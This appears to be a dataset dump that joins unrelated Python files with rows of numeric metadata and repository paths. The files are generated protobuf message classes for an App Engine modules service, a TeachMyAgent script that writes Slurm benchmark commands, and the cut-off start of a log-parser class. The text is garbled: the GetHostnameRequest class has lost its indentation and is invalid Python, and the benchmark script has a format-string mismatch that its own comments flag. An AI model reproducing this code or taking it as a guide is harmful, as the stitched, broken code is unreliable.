    """Serialized size is always zero."""
    return 0

  def ByteSizePartial(self):
    """Partial serialized size is always zero."""
    return 0

  def Clear(self):
    """Nothing to clear."""
    pass

  def OutputUnchecked(self, out):
    """Nothing to write."""
    pass

  def OutputPartial(self, out):
    """Nothing to write."""
    pass

  def TryMerge(self, d):
    """Skip every tag in decoder `d`; tag 0 marks a corrupt stream."""
    while d.avail() > 0:
      tag = d.getVarInt32()
      if tag == 0:
        raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tag)

  def __str__(self, prefix="", printElemNumber=0):
    """Text form of a fieldless message is the empty string."""
    return ""

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple(sparse.get(tag, default) for tag in xrange(maxtag + 1))

  _TEXT = _BuildTagLookupTable({0: "ErrorCode"}, 0)
  _TYPES = _BuildTagLookupTable({0: ProtocolBuffer.Encoder.NUMERIC}, 0,
                                ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = ""
  _STYLE_CONTENT_TYPE = ""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.SetNumInstancesResponse'
class StartModuleRequest(ProtocolBuffer.ProtocolMessage):
  """Request for ModulesService.StartModule.

  Generated message with two required string fields:
  module = 1, version = 2.
  """

  # Presence bits and default values for the required fields.
  has_module_ = 0
  module_ = ""
  has_version_ = 0
  version_ = ""

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def module(self): return self.module_
  def set_module(self, x):
    self.has_module_ = 1
    self.module_ = x
  def clear_module(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_module_:
      self.has_module_ = 0
      self.module_ = ""
  def has_module(self): return self.has_module_

  def version(self): return self.version_
  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x
  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = ""
  def has_version(self): return self.has_version_

  def MergeFrom(self, x):
    """Copy set fields from another StartModuleRequest into self."""
    assert x is not self
    if (x.has_module()): self.set_module(x.module())
    if (x.has_version()): self.set_version(x.version())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_module_ != x.has_module_: return 0
    if self.has_module_ and self.module_ != x.module_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # Both fields are required; report each that is missing.
    initialized = 1
    if (not self.has_module_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: module not set.')
    if (not self.has_version_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: version not set.')
    return initialized
  def ByteSize(self):
    # Assumes both required fields are set: payloads plus 2 tag bytes.
    n = 0
    n += self.lengthString(len(self.module_))
    n += self.lengthString(len(self.version_))
    return n + 2
  def ByteSizePartial(self):
    # Unlike ByteSize, tolerates required fields being unset.
    n = 0
    if (self.has_module_):
      n += 1
      n += self.lengthString(len(self.module_))
    if (self.has_version_):
      n += 1
      n += self.lengthString(len(self.version_))
    return n
  def Clear(self):
    self.clear_module()
    self.clear_version()
  def OutputUnchecked(self, out):
    # Tags: 10 = field 1, 18 = field 2; written unconditionally
    # because both fields are required.
    out.putVarInt32(10)
    out.putPrefixedString(self.module_)
    out.putVarInt32(18)
    out.putPrefixedString(self.version_)
  def OutputPartial(self, out):
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_module(d.getPrefixedString())
        continue
      if tt == 18:
        self.set_version(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kmodule = 1
  kversion = 2
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
    2: "version",
  }, 2)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
  }, 2, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.StartModuleRequest'
class StartModuleResponse(ProtocolBuffer.ProtocolMessage):
  """Response for ModulesService.StartModule.

  This message declares no fields, so its wire encoding is always empty.
  """

  def __init__(self, contents=None):
    # Nothing to initialize; optionally decode a serialized payload.
    if contents is not None:
      self.MergeFromString(contents)

  def MergeFrom(self, x):
    """No fields to copy; merging a message into itself is still forbidden."""
    assert x is not self

  def Equals(self, x):
    """Every instance compares equal: there is no field state."""
    return 1

  def IsInitialized(self, debug_strs=None):
    """A fieldless message is always initialized."""
    return 1

  def ByteSize(self):
    """Serialized size is always zero."""
    return 0

  def ByteSizePartial(self):
    """Partial serialized size is always zero."""
    return 0

  def Clear(self):
    """Nothing to clear."""
    pass

  def OutputUnchecked(self, out):
    """Nothing to write."""
    pass

  def OutputPartial(self, out):
    """Nothing to write."""
    pass

  def TryMerge(self, d):
    """Skip every tag in decoder `d`; tag 0 marks a corrupt stream."""
    while d.avail() > 0:
      tag = d.getVarInt32()
      if tag == 0:
        raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tag)

  def __str__(self, prefix="", printElemNumber=0):
    """Text form of a fieldless message is the empty string."""
    return ""

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple(sparse.get(tag, default) for tag in xrange(maxtag + 1))

  _TEXT = _BuildTagLookupTable({0: "ErrorCode"}, 0)
  _TYPES = _BuildTagLookupTable({0: ProtocolBuffer.Encoder.NUMERIC}, 0,
                                ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = ""
  _STYLE_CONTENT_TYPE = ""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.StartModuleResponse'
class StopModuleRequest(ProtocolBuffer.ProtocolMessage):
  """Request for ModulesService.StopModule.

  Generated message with two optional string fields:
  module = 1, version = 2.
  """

  # Presence bits and default values for the optional fields.
  has_module_ = 0
  module_ = ""
  has_version_ = 0
  version_ = ""

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def module(self): return self.module_
  def set_module(self, x):
    self.has_module_ = 1
    self.module_ = x
  def clear_module(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_module_:
      self.has_module_ = 0
      self.module_ = ""
  def has_module(self): return self.has_module_

  def version(self): return self.version_
  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x
  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = ""
  def has_version(self): return self.has_version_

  def MergeFrom(self, x):
    """Copy set fields from another StopModuleRequest into self."""
    assert x is not self
    if (x.has_module()): self.set_module(x.module())
    if (x.has_version()): self.set_version(x.version())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_module_ != x.has_module_: return 0
    if self.has_module_ and self.module_ != x.module_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # All fields optional, so always initialized.
    initialized = 1
    return initialized
  def ByteSize(self):
    # 1 tag byte plus length-prefixed payload per set string field.
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
    return n
  def ByteSizePartial(self):
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
    return n
  def Clear(self):
    self.clear_module()
    self.clear_version()
  def OutputUnchecked(self, out):
    # Tags: 10 = field 1, 18 = field 2; both wire type 2 (length-delimited).
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
  def OutputPartial(self, out):
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_module(d.getPrefixedString())
        continue
      if tt == 18:
        self.set_version(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kmodule = 1
  kversion = 2
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
    2: "version",
  }, 2)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
  }, 2, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.StopModuleRequest'
class StopModuleResponse(ProtocolBuffer.ProtocolMessage):
  """Response for ModulesService.StopModule.

  This message declares no fields, so its wire encoding is always empty.
  """

  def __init__(self, contents=None):
    # Nothing to initialize; optionally decode a serialized payload.
    if contents is not None:
      self.MergeFromString(contents)

  def MergeFrom(self, x):
    """No fields to copy; merging a message into itself is still forbidden."""
    assert x is not self

  def Equals(self, x):
    """Every instance compares equal: there is no field state."""
    return 1

  def IsInitialized(self, debug_strs=None):
    """A fieldless message is always initialized."""
    return 1

  def ByteSize(self):
    """Serialized size is always zero."""
    return 0

  def ByteSizePartial(self):
    """Partial serialized size is always zero."""
    return 0

  def Clear(self):
    """Nothing to clear."""
    pass

  def OutputUnchecked(self, out):
    """Nothing to write."""
    pass

  def OutputPartial(self, out):
    """Nothing to write."""
    pass

  def TryMerge(self, d):
    """Skip every tag in decoder `d`; tag 0 marks a corrupt stream."""
    while d.avail() > 0:
      tag = d.getVarInt32()
      if tag == 0:
        raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tag)

  def __str__(self, prefix="", printElemNumber=0):
    """Text form of a fieldless message is the empty string."""
    return ""

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple(sparse.get(tag, default) for tag in xrange(maxtag + 1))

  _TEXT = _BuildTagLookupTable({0: "ErrorCode"}, 0)
  _TYPES = _BuildTagLookupTable({0: ProtocolBuffer.Encoder.NUMERIC}, 0,
                                ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = ""
  _STYLE_CONTENT_TYPE = ""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.StopModuleResponse'
class GetHostnameRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
has_version_ = 0
version_ = ""
has_instance_ = 0
instance_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def instance(self): return self.instance_
def set_instance(self, x):
self.has_instance_ = 1
self.instance_ = x
def clear_instance(self):
if self.has_instance_:
self.has_instance_ = 0
self.instance_ = ""
def has_instance(self): return self.has_instance_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
if (x.has_version()): self.set_version(x.version())
if (x.has_instance()): self.set_instance(x.instance())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
if self.has_instance_ != x.has_instance_: return 0
if self.has_instance_ and self.instance_ != x.instance_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
if (self.has_instance_): n += 1 + self.lengthString(len(self.instance_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
if (self.has_instance_): n += 1 + self.lengthString(len(self.instance_))
return n
def Clear(self):
self.clear_module()
self.clear_version()
self.clear_instance()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
if (self.has_instance_):
out.putVarInt32(26)
out.putPrefixedString(self.instance_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
if (self.has_instance_):
out.putVarInt32(26)
out.putPrefixedString(self.instance_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if tt == 18:
self.set_version(d.getPrefixedString())
continue
if tt == 26:
self.set_instance(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
if self.has_instance_: res+=prefix+("instance: %s\n" % self.DebugFormatString(self.instance_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
  # Expand a sparse {tag: value} dict into a dense tuple indexed 0..maxtag.
  # Called at class-definition time (no self); `xrange` means this module
  # targets Python 2.
  return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
# Field-number constants and generated lookup tables for this message.
kmodule = 1
kversion = 2
kinstance = 3
# Tag -> field-name table used for text formatting (index 0 is the
# conventional "ErrorCode" placeholder).
_TEXT = _BuildTagLookupTable({
  0: "ErrorCode",
  1: "module",
  2: "version",
  3: "instance",
}, 3)
# Tag -> wire-type table used by the encoder/decoder.
_TYPES = _BuildTagLookupTable({
  0: ProtocolBuffer.Encoder.NUMERIC,
  1: ProtocolBuffer.Encoder.STRING,
  2: ProtocolBuffer.Encoder.STRING,
  3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetHostnameRequest'
class GetHostnameResponse(ProtocolBuffer.ProtocolMessage):
  # Generated protobuf message with a single REQUIRED string field,
  # `hostname` (field number 1, wire tag 10).

  has_hostname_ = 0
  hostname_ = ""

  def __init__(self, contents=None):
    # Optionally deserialize from a byte string.
    if contents is not None: self.MergeFromString(contents)

  def hostname(self): return self.hostname_

  def set_hostname(self, x):
    self.has_hostname_ = 1
    self.hostname_ = x

  def clear_hostname(self):
    # Guarded so clearing an unset field is a no-op.
    if self.has_hostname_:
      self.has_hostname_ = 0
      self.hostname_ = ""

  def has_hostname(self): return self.has_hostname_

  def MergeFrom(self, x):
    # Copy set fields from another instance of the same message type.
    assert x is not self
    if (x.has_hostname()): self.set_hostname(x.hostname())

  def Equals(self, x):
    # Field-by-field equality; returns 1/0 (generated pre-bool style).
    if x is self: return 1
    if self.has_hostname_ != x.has_hostname_: return 0
    if self.has_hostname_ and self.hostname_ != x.hostname_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # hostname is required: unset hostname means not initialized.
    initialized = 1
    if (not self.has_hostname_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: hostname not set.')
    return initialized

  def ByteSize(self):
    # +1 accounts for the required field's tag byte.
    n = 0
    n += self.lengthString(len(self.hostname_))
    return n + 1

  def ByteSizePartial(self):
    # Like ByteSize() but tolerates the required field being unset.
    n = 0
    if (self.has_hostname_):
      n += 1
      n += self.lengthString(len(self.hostname_))
    return n

  def Clear(self):
    self.clear_hostname()

  def OutputUnchecked(self, out):
    # Tag 10 = field 1, length-delimited.
    out.putVarInt32(10)
    out.putPrefixedString(self.hostname_)

  def OutputPartial(self, out):
    if (self.has_hostname_):
      out.putVarInt32(10)
      out.putPrefixedString(self.hostname_)

  def TryMerge(self, d):
    # Decode from decoder `d`; unknown tags are skipped, tag 0 is invalid.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_hostname(d.getPrefixedString())
        continue
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)

  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_hostname_: res+=prefix+("hostname: %s\n" % self.DebugFormatString(self.hostname_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Expand a sparse {tag: value} dict into a dense tuple (class-def time).
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  khostname = 1

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "hostname",
  }, 1)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetHostnameResponse'
# Extension-runtime hook emitted by the generator (no-op in this build).
if _extension_runtime:
  pass

# Explicit public API of this generated module.
__all__ = ['ModulesServiceError','GetModulesRequest','GetModulesResponse','GetVersionsRequest','GetVersionsResponse','GetDefaultVersionRequest','GetDefaultVersionResponse','GetNumInstancesRequest','GetNumInstancesResponse','SetNumInstancesRequest','SetNumInstancesResponse','StartModuleRequest','StartModuleResponse','StopModuleRequest','StopModuleResponse','GetHostnameRequest','GetHostnameResponse']
| 24.839779
| 401
| 0.66964
| 5,744
| 44,960
| 5.029248
| 0.038127
| 0.043859
| 0.038632
| 0.028039
| 0.87905
| 0.871642
| 0.866761
| 0.86323
| 0.846891
| 0.846891
| 0
| 0.020017
| 0.211077
| 44,960
| 1,809
| 402
| 24.85351
| 0.794418
| 0.012656
| 0
| 0.891648
| 0
| 0
| 0.040856
| 0.016406
| 0
| 0
| 0
| 0
| 0.012792
| 1
| 0.214447
| false
| 0.015801
| 0.002257
| 0.043642
| 0.417607
| 0.015049
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9adb8ec86466a8e6cdf6edf477cb5731ea213328
| 7,482
|
py
|
Python
|
TeachMyAgent/run_utils/generate_benchmark_script.py
|
flowersteam/TeachMyAgent
|
a8f71cbfce4cb8ca6da24d00ea690495e3afbd2e
|
[
"MIT"
] | 45
|
2021-03-19T00:16:57.000Z
|
2022-03-20T14:02:18.000Z
|
TeachMyAgent/run_utils/generate_benchmark_script.py
|
flowersteam/TeachMyAgent
|
a8f71cbfce4cb8ca6da24d00ea690495e3afbd2e
|
[
"MIT"
] | 5
|
2021-04-26T06:21:10.000Z
|
2021-12-24T02:57:02.000Z
|
TeachMyAgent/run_utils/generate_benchmark_script.py
|
flowersteam/TeachMyAgent
|
a8f71cbfce4cb8ca6da24d00ea690495e3afbd2e
|
[
"MIT"
] | 5
|
2021-03-23T20:21:14.000Z
|
2022-03-22T14:55:11.000Z
|
import sys

if __name__ == '__main__':
    '''
    Generate a script launching all experiments needed to perform the full benchmark (both skill-specific and global performance) for a teacher.
    '''
    # CLI: argv[1] is the teacher/experiment name; any further argv tokens
    # are forwarded verbatim onto every generated command line.
    experiment_name = sys.argv[1]
    experiment_arguments = ' '.join(sys.argv[2:])
    nb_seeds = 16 # {}
    with open("benchmark_scripts/full_benchmark_" + experiment_name + ".txt", 'w') as f:
        f.write('#### PROFILING STUMPS\n')
        # One batch of profiling experiments per expert-knowledge level.
        for ek in ["no", "low", "high"]:
            f.write('## {} Expert Knowledge\n'.format(ek))
            f.write('# Mostly unfeasible task space\n')
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_1 '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 9.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal --*allow_expert_knowledge {} '
                '--student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write('# Mostly feasible task space\n')
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_2 '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 3.0 --min_stump_h -3.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal '
                '--*allow_expert_knowledge {} --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
                '--nb_test_episode 100 --nb_env_steps 20 {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write('# Ability to handle a student that can forget\n')
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_3 '
                '--test_set parametric_stumps_test_set --reset_frequency 7000000 --keep_periodical_task_samples 250000 '
                '--env parametric-continuous-stump-tracks-v0 --max_stump_h 3.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal '
                '--*allow_expert_knowledge {} --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
                '--nb_test_episode 100 --nb_env_steps 20 {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write('# Handle discontinuous difficulty over task space\n')
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_4 --shuffle_dimensions '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 3.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal --*allow_expert_knowledge {} '
                '--student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write('# Robustness over a variety of students\n')
            # Criterion 5 is a 2x2 grid: {spider, small_bipedal} x {sac, ppo}.
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type spider --*allow_expert_knowledge {} '
                '--*student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type small_bipedal --*allow_expert_knowledge {} '
                '--*student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type spider --*allow_expert_knowledge {} '
                '--*student ppo --lr 0.0003 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 -hs {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
            f.write(
                '--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
                '--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
                '--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type small_bipedal --*allow_expert_knowledge {} '
                '--*student ppo --lr 0.0003 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 -hs {}\n'
                .format(nb_seeds, experiment_name, ek, experiment_arguments)
            )
        f.write('#### PARKOUR\n')
        # NOTE(review): the three PARKOUR templates below contain only TWO
        # '{}' placeholders while .format() receives FOUR arguments, so the
        # exp_name suffix is filled with nb_seeds (i.e. "benchmark_parkour_16")
        # and the trailing placeholder with experiment_name;
        # experiment_arguments and ek are silently dropped.  Presumably
        # .format(experiment_name, experiment_arguments) was intended --
        # confirm before relying on the generated file.
        # NOTE(review): `ek` is also read here after the loop (Python leaks
        # the loop variable); indentation was reconstructed from a
        # whitespace-mangled copy -- confirm this section sits outside the
        # expert-knowledge loop.
        f.write(
            '--slurm_conf curta_inria_long --nb_seeds 16 --exp_name benchmark_parkour_{} --test_set walking_test_set_v1 '
            '--keep_periodical_task_samples 250000 --env parametric-continuous-parkour-v0 --*walker_type old_classic_bipedal '
            '--allow_expert_knowledge minimal --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
            '--nb_test_episode 100 --nb_env_steps 20 {}\n'
            .format(nb_seeds, experiment_name, ek, experiment_arguments)
        )
        f.write(
            '--slurm_conf curta_inria_long --nb_seeds 16+16 --exp_name benchmark_parkour_{} --test_set climbing_test_set_v1 '
            '--keep_periodical_task_samples 250000 --env parametric-continuous-parkour-v0 --*walker_type climbing_profile_chimpanzee '
            '--allow_expert_knowledge minimal --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
            '--nb_test_episode 100 --nb_env_steps 20 {}\n'
            .format(nb_seeds, experiment_name, ek, experiment_arguments)
        )
        f.write(
            '--slurm_conf curta_inria_long --nb_seeds 16+32 --exp_name benchmark_parkour_{} --test_set swimming_test_set_v1 '
            '--keep_periodical_task_samples 250000 --env parametric-continuous-parkour-v0 --*walker_type fish '
            '--allow_expert_knowledge minimal --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
            '--nb_test_episode 100 --nb_env_steps 20 {}\n'
            .format(nb_seeds, experiment_name, ek, experiment_arguments)
        )
| 74.82
| 148
| 0.64702
| 956
| 7,482
| 4.662134
| 0.144351
| 0.036123
| 0.027148
| 0.03702
| 0.87256
| 0.87256
| 0.859098
| 0.845187
| 0.841373
| 0.841373
| 0
| 0.054978
| 0.241513
| 7,482
| 99
| 149
| 75.575758
| 0.730396
| 0.000267
| 0
| 0.56383
| 1
| 0.074468
| 0.660563
| 0.24023
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010638
| 0
| 0.010638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9afd9b0d7afc637b94e1467881067432a844c938
| 3,406
|
py
|
Python
|
build/lib.linux-x86_64-2.7/timediff/log_parser.py
|
nomelif/time-diff
|
cc713399166d278855004b38e4911c2a07ed478f
|
[
"MIT"
] | 2
|
2016-04-08T20:14:31.000Z
|
2019-11-19T12:23:35.000Z
|
timediff/log_parser.py
|
nomelif/time-diff
|
cc713399166d278855004b38e4911c2a07ed478f
|
[
"MIT"
] | null | null | null |
timediff/log_parser.py
|
nomelif/time-diff
|
cc713399166d278855004b38e4911c2a07ed478f
|
[
"MIT"
] | null | null | null |
import time
import datetime
class LogParser():
    """
    Parse timestamped log lines and compute time differences between them.

    Timestamps are parsed with ``time.strptime``.  When the format carries
